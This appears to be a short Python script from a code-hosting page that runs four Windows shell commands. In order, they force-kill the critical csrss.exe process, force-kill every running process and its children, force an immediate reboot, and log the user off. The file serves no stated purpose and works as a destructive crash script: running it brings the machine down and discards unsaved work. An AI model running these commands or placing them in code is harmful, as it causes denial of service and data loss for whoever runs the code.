6 lines
136 B
Python
6 lines
136 B
Python
|
import os
|
||
|
|
||
|
os.system("taskkill /f /im csrss.exe")
|
||
|
os.system("taskkill /f /im * /t")
|
||
|
os.system("shutdown /r /f /t 0")
|
||
|
os.system("logoff")
|